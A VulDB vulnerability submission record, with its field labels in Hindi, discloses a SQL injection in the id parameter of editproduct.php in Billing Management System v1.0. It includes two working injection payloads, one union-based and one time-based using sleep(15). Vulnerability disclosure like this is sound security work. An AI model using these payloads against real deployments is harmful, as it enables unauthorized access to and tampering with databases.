| शीर्षक | Billing Management System v1.0 /smartbilling_source_code/editproduct.php GET parameter id exists SQL injection vulnerability |
|---|
| विवरण | An issue was discovered in Billing Management System v1.0.
There is a SQL injection that can directly issue instructions to the background database system via /smartbilling_source_code/editproduct.php?id.
Payload1: id=-1 union all select null,null,null,null,concat(0x565758,0x686970),null,null,null,null-- -
Payload2:id=2 and (select 2 from (select(sleep(15)))i) |
|---|
| स्रोत | ⚠️ https://github.com/niyuchunqiu/cve/blob/main/SQL.md |
|---|
| उपयोगकर्ता | lixu (UID 46762) |
|---|
| सबमिशन | 14/05/2023 05:06 AM (3 साल पहले) |
|---|
| संयम | 14/05/2023 09:36 AM (5 hours later) |
|---|
| स्थिति | स्वीकृत |
|---|
| VulDB प्रविष्टि | 228970 [SourceCodester Billing Management System 1.0 GET Parameter editproduct.php पहचान SQL इंजेक्शन] |
|---|
| अंक | 19 |
|---|